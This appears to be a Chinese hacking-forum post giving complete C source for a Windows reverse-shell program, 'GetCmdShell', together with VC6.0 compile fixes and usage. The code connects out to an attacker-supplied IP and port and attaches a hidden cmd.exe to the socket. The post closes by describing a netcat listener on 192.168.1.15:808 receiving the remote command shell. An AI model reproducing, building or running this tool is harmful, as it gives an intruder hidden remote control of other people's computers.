老鬼的话：

在VC6.0中新建一个WIN32 CONSOLE 程序，然后将以下代码粘进去

// GetCmdShell.cpp : Defines the entry point for the console application.
//

/*
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+老鬼 [QQ:147399120]  收集整理,转载请注明出处 http://www.qhwins.com                                +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*/
//#include <stdafx.h>

#include <winsock2.h>
#include <stdio.h>
#include <winsock.h>
#include <stdlib.h>

#define RCVBUFSIZE 32

void main(int argc,char *argv[])
{
 //Declaring the vars
    int sock;
    struct sockaddr_in cbAddr;
    unsigned short cbPort;
    char *cbIp;
    WSADATA wsaData;
 STARTUPINFO si;
 PROCESS_INFORMATION pi={0};
 char comspec[MAX_PATH];

//parsing arguments to the corresponding vars.
 cbIp = argv[1];
 cbPort = atoi(argv[2]);

//starting up wsa
    if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0)
    {
        printf("WSAStartup() failed");
        exit(1);
    }
//Make shure it's WSASocket()
    if ((sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
 {
        printf("Socket Failed\n");
  WSACleanup();
  exit(1);
 }

//filling the struct
    memset(&cbAddr, 0, sizeof(cbAddr));
    cbAddr.sin_family      = AF_INET;
    cbAddr.sin_addr.s_addr = inet_addr(cbIp);
    cbAddr.sin_port        = htons(cbPort);

 // Establish the connection to the echo server
    if (connect(sock, (struct sockaddr *) &cbAddr, sizeof(cbAddr)) < 0)
 {
        printf("connect() failed\n");
  closesocket(sock);
  WSACleanup();
  exit(1);
 }
//Setting up the startupinfo etc to make shure cmd get's a both way traffic
  memset(&si,0,sizeof(si));
  GetStartupInfo(&si);
  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_HIDE;
  si.hStdInput = (HANDLE)sock;
  si.hStdOutput = (HANDLE)sock;
  si.hStdError =(HANDLE)sock;
//getting cmd.exe a bit more fancier then hardcoding it.
  if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
  {
   printf("Environment var failed\n");
   closesocket(sock);
   exit(1);
  }
  if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
  {
   printf("process creation failed\n");
   closesocket(sock);
   CloseHandle(pi.hProcess);
   CloseHandle(pi.hThread);
  }

  WaitForSingleObject(pi.hProcess, INFINITE);
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  closesocket(sock);
}

在编译的时候可能会报错，用以下方法配置。

一、工程>设置>c\c++>Y分类里面选择预编译头（页眉）>选择“不使用补偿页眉”>

上面设置完以后可能还会报错，解决方法：

二、同一位置，切换到LINK选项卡，找到库文件列表，加入  ws2_32.lib库即可。

编译通过，然后在CMD下面调用测试，成功返回CMDSHELL。

方法：getcmdshell.exe 192.168.1.15 808

然后NC监听的窗口中成功返回远程的CMDSHELL。